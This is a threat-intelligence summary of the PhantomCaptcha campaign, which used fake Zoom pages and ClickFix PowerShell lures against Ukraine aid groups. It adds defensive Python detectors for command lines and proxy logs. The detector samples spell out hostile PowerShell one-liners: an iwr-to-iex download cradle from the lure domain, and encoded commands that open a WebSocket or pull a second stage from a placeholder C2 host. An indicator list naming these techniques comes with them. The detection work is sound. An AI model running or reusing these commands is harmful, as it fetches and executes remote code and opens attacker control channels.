Ukraine Aid Groups Targeted Through Fake Zoom Meetings and Weaponized PDF Files
Cybersecurity researchers have disclosed details of a coordinated spear-phishing campaign dubbed PhantomCaptcha targeting organizations associated with Ukraine's war relief efforts to deliver a remote access trojan that uses a WebSocket for command-and-control (C2). The activity, which took place on October 8, 2025, targeted individual members of the International Red Cross, Norwegian Refugee
AI Analysis
Technical Summary
PhantomCaptcha is a spear-phishing campaign disclosed in October 2025 that targeted organizations involved in Ukraine's war relief efforts, including the International Red Cross, the Norwegian Refugee Council, UNICEF Ukraine and regional Ukrainian government administrations; the activity was concentrated on a single day, October 8, 2025. The chain starts with emails impersonating the Ukrainian President's Office that carry weaponized PDFs containing embedded links. Clicking a link leads to a fake Zoom site (zoomconference[.]app) that displays a spoofed Cloudflare CAPTCHA and, in the ClickFix pattern, instructs the visitor to copy and run a PowerShell command to "verify" they are human. That command retrieves an obfuscated downloader, which fetches a second stage that performs host reconnaissance and then installs a WebSocket-based remote access trojan (RAT). The RAT connects to command-and-control infrastructure hosted in Russia and exchanges Base64-encoded JSON messages over the WebSocket, letting the operators run arbitrary PowerShell commands and exfiltrate the results. The infrastructure was registered months before use and each domain was live only briefly, which leaves little time for reputation-based blocking. Separate domains hosted fake Android applications that collected extensive device data. The campaign shows strong operational security, compartmentalized infrastructure and carefully built social-engineering pretexts. Attribution is not confirmed; the researchers note overlaps with tradecraft previously used by the Russia-linked COLDRIVER group. The focus on humanitarian and government entities supporting Ukraine points to intelligence collection with a geopolitical motive.
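The execution step in that chain (a pasted PowerShell one-liner that pulls an obfuscated downloader, with later stages bootstrapping a WebSocket client) is what endpoint telemetry actually records. The following is an added example of scoring such command lines, written for this page and not taken from the researchers' report. It assumes Sysmon Event ID 1 or Security 4688 command lines as input; the sample lines are constructed, the C2 hostnames (c2.example) are placeholders, and the indicator weights are a starting point rather than a tuned rule.

```python
"""Score PowerShell command lines for ClickFix-style lure indicators.

Added helper, not code from the PhantomCaptcha write-up.  Input is a process
command line as logged by Sysmon Event ID 1 or Security 4688.  It decodes
-EncodedCommand payloads (Base64 of UTF-16LE) and FromBase64String() literals,
then scans every layer for the traits of a one-liner pasted from a fake
CAPTCHA page.  Indicator weights are an assumption, not a tuned rule.
"""
from __future__ import annotations

import base64
import re

INDICATORS = {
    r"-(?:w|win|windowstyle)\s+hidden": ("hidden_window", 2),
    r"-(?:ep|ex(?:ec)?|executionpolicy)\s+bypass": ("ep_bypass", 2),
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile)\b": ("download_cradle", 3),
    r"\biex\b|invoke-expression": ("invoke_expression", 3),
    r"frombase64string": ("base64_unwrap", 1),
    r"clientwebsocket|system\.net\.websockets": ("websocket_client", 3),
    r"\bwss?://": ("websocket_url", 2),
}
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
B64_ARG_RE = re.compile(r"frombase64string\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)", re.I)


def _decode_bytes(raw: bytes) -> str | None:
    # -EncodedCommand and [Text.Encoding]::Unicode are UTF-16LE, which shows up
    # as NUL bytes between ASCII characters; anything else is treated as UTF-8.
    try:
        return raw.decode("utf-16-le" if b"\x00" in raw else "utf-8")
    except UnicodeDecodeError:
        return None


def _b64_to_text(blob: str) -> str | None:
    try:
        return _decode_bytes(base64.b64decode(blob, validate=True))
    except ValueError:
        return None


def decode_encoded_command(cmdline: str) -> str | None:
    """Plaintext behind -EncodedCommand / -enc / -e, or None if absent."""
    m = ENC_RE.search(cmdline)
    return _b64_to_text(m.group(1)) if m else None


def unwrap_layers(text: str, max_depth: int = 3) -> list[str]:
    """text plus the plaintext of nested FromBase64String("...") literals."""
    layers = [text]
    for _ in range(max_depth):
        inner = [t for t in (_b64_to_text(m.group(1)) for m in B64_ARG_RE.finditer(layers[-1])) if t]
        if not inner:
            break
        layers.append("\n".join(inner))
    return layers


def analyze(cmdline: str) -> dict:
    """Decode every layer of a command line and score the indicators found."""
    layers = unwrap_layers(cmdline)
    plain = decode_encoded_command(cmdline)
    if plain:
        layers += unwrap_layers(plain)
    # Mask Base64 blobs before matching so their random letters cannot hit a word pattern.
    blob = B64_ARG_RE.sub("FromBase64String(<decoded>)", ENC_RE.sub("-Enc <decoded>", "\n".join(layers)))
    hits = {name: w for pat, (name, w) in INDICATORS.items() if re.search(pat, blob, re.I)}
    return {"score": sum(hits.values()), "hits": sorted(hits), "layers": len(layers)}


def is_suspicious(cmdline: str, threshold: int = 5) -> bool:
    return analyze(cmdline)["score"] >= threshold


def _b64(text: str) -> str:
    return base64.b64encode(text.encode("utf-16-le")).decode()


# Constructed samples, not telemetry from the campaign.  The lure's visible
# one-liner uses the domain named in the write-up; c2.example is a placeholder.
SAMPLE_CLICKFIX = ('powershell.exe -w hidden -ep bypass -c '
                   '"iwr https://zoomconference[.]app/verify.txt -UseBasicParsing | iex"')
SAMPLE_ENCODED = "powershell.exe -NoP -NonI -Enc " + _b64(
    '$c = New-Object System.Net.WebSockets.ClientWebSocket; '
    '$c.ConnectAsync("wss://c2.example/ws", [Threading.CancellationToken]::None).Wait()')
_INNER = "(New-Object Net.WebClient).DownloadString('http://c2.example/s2')"
SAMPLE_NESTED = ('powershell.exe -c "$p = [Text.Encoding]::Unicode.GetString('
                 "[Convert]::FromBase64String('" + _b64(_INNER) + "')); iex $p\"")
SAMPLE_BENIGN = "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"

if __name__ == "__main__":
    for label, cmd in [("clickfix", SAMPLE_CLICKFIX), ("encoded", SAMPLE_ENCODED),
                       ("nested", SAMPLE_NESTED), ("benign", SAMPLE_BENIGN)]:
        print(label, analyze(cmd))
```

The point of masking the Base64 blobs before pattern matching is that a raw `-Enc` argument is hundreds of random letters and will eventually contain substrings like `iex` or `irm`; decoding first and matching on the plaintext keeps the score honest. Feeding the same function script block log events (Event ID 4104) instead of process command lines works as well and catches payloads that were never visible on the command line.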
Potential Impact
European organizations involved in humanitarian aid, government administration and international relief efforts for Ukraine are the campaign's primary targets. A successful compromise exposes sensitive personal data on beneficiaries and staff, disrupts operations and can leak strategic information about relief logistics. Because the RAT executes arbitrary PowerShell commands, it gives the operators interactive access to exfiltrate data, move laterally and stage further malware, affecting the confidentiality, integrity and availability of critical services. The fake Zoom lure abuses trust in a collaboration tool that relief staff use daily, which raises the odds that a well-crafted invitation gets clicked. The companion Android applications extend the exposure to aid workers' mobile devices, including location and communications data, with direct operational-security consequences for field staff. The medium severity rating reflects the narrow, targeted scope and the user interaction required; for an organization actually in scope, the impact of a compromise is high.
Mitigation Recommendations
1. Tune email security for the spear-phishing signals seen here: sender-domain impersonation of government offices (enforce SPF, DKIM and DMARC evaluation on inbound mail) and PDF attachments whose only content is an external link. Detonate attachments and follow embedded URLs in a sandbox before delivery.
2. Train staff, especially those coordinating Ukraine relief, on the ClickFix pattern: no legitimate CAPTCHA, Zoom page or "verification" step asks a user to open the Run dialog or a terminal and paste a command. Treat meeting invitations that arrive as links inside PDFs as suspect and confirm them out of band.
3. Restrict PowerShell for standard users: enforce Constrained Language Mode, apply application allow-listing with AppLocker or WDAC, and enable script block logging (Event ID 4104) and module logging so that decoded commands reach the SOC. Where feasible, remove the Run dialog via Group Policy for users who do not need it.
4. Deploy EDR with detections for obfuscated or encoded PowerShell (-EncodedCommand, -WindowStyle Hidden, download cradles piped to Invoke-Expression) and for PowerShell processes opening outbound WebSocket connections.
5. Inspect proxy and firewall logs for WebSocket upgrades (HTTP 101) from user workstations to domains outside the approved collaboration and SaaS allow-list, prioritizing newly registered or short-lived domains.
6. Validate meeting invitations through official channels; Zoom links should resolve to the vendor's own domains, not look-alikes such as zoomconference[.]app.
7. Enforce MDM policies on mobile devices: block sideloading of APKs from untrusted sources and alert on apps that request broad permissions (location, contacts, SMS).
8. Ingest current threat intelligence for this campaign (domains, hashes, C2 addresses) into blocklists and retro-hunt logs around October 8, 2025 for earlier contact with the infrastructure.
9. Coordinate with national CSIRTs and humanitarian-sector partners to share indicators and incident details quickly.
10. Run incident response exercises that simulate collaboration-tool lures and ClickFix-style command execution so that detection, containment and user reporting are tested end to end.
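For recommendations 5 and 6, the following is an added example (not from the page or the researchers' report) of the two checks a proxy log supports offline: collaboration-tool brand look-alike domains, and WebSocket upgrades to hosts outside an approved list. The log format, the approved-domain set, the brand tokens and every host other than zoomconference[.]app are assumptions; a production version would also enrich hits with domain registration age, which this offline example cannot do.

```python
"""Flag proxy-log entries that match the PhantomCaptcha delivery and C2 shape.

Added example, not code from the write-up.  Reads a constructed,
space-delimited proxy log (timestamp, client, method, URL, status, Upgrade
header) and reports hosts that borrow a collaboration-tool brand name while
sitting outside the vendor's own registrable domains, plus WebSocket upgrades
(HTTP 101) to any host not on the approved SaaS list.  APPROVED_DOMAINS and
BRAND_TOKENS are assumptions to tune per organization.
"""
from __future__ import annotations

from urllib.parse import urlsplit

# Registrable domains treated as legitimate collaboration endpoints (assumption).
APPROVED_DOMAINS = {"zoom.us", "zoom.com", "microsoft.com", "google.com", "webex.com"}
BRAND_TOKENS = ("zoom", "teams", "webex", "meet")


def registrable_domain(host: str) -> str:
    # Last two labels; a production version would consult the Public Suffix List
    # so that hosts under co.uk-style suffixes are handled correctly.
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def parse_line(line: str) -> dict | None:
    """Parse 'ts client method url status upgrade'; None for malformed input."""
    parts = line.split()
    if len(parts) != 6:
        return None
    ts, client, method, url, status, upgrade = parts
    host = urlsplit(url).hostname
    if not host or not status.isdigit():
        return None
    return {"ts": ts, "client": client, "method": method, "url": url,
            "host": host, "status": int(status), "upgrade": upgrade.lower()}


def classify(rec: dict) -> list[str]:
    """Reasons a record deserves a look; empty list means nothing found."""
    reasons = []
    approved = registrable_domain(rec["host"]) in APPROVED_DOMAINS
    # A brand token inside a host the vendor does not own is the zoomconference[.]app shape.
    if not approved and any(tok in rec["host"].lower() for tok in BRAND_TOKENS):
        reasons.append("brand_lookalike")
    # WebSocket C2 shows up as a 101 Switching Protocols or an Upgrade: websocket header.
    is_ws = rec["status"] == 101 or rec["upgrade"] == "websocket"
    if is_ws and not approved:
        reasons.append("ws_to_unapproved")
    return reasons


def scan(lines) -> list[dict]:
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"ts": rec["ts"], "client": rec["client"],
                             "host": rec["host"], "reasons": reasons})
    return findings


# Constructed log lines.  Only zoomconference.app comes from the write-up; the
# other non-vendor host is a placeholder.  The last line tests malformed input.
SAMPLE_LOG = [
    "2025-10-08T10:15:02Z 10.0.0.5 GET https://zoom.us/j/123456789 200 -",
    "2025-10-08T10:15:40Z 10.0.0.5 GET https://zoomconference.app/verify 200 -",
    "2025-10-08T10:16:10Z 10.0.0.5 GET https://ws.relay-update.example/socket 101 websocket",
    "2025-10-08T10:17:00Z 10.0.0.7 GET https://teams.microsoft.com/api/mt/beta 200 -",
    "2025-10-08T10:17:30Z 10.0.0.7 GET https://meet.google.com/abc-defg-hij 101 websocket",
    "malformed line",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The allow-list is what keeps this usable: legitimate Zoom, Teams and Meet sessions all speak WebSocket, so alerting on every 101 would bury the analyst. The brand-token check is deliberately loose (any host containing "zoom" that the vendor does not own) because the lure here did not need a typo-squat, only a plausible name on an unrelated TLD.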
Affected Countries
Ukraine, Italy, Slovakia, Norway, United Kingdom, Germany, Poland, France
Technical Details
- Article source: https://thehackernews.com/2025/10/ukraine-aid-groups-targeted-through.html (fetched 2025-10-23T01:21:32Z, 1,188 words)
Threat ID: 68f9831e93bcde9f320bfbd9
Added to database: 10/23/2025, 1:21:34 AM
Last enriched: 10/23/2025, 1:22:06 AM
Last updated: 12/7/2025, 7:47:17 AM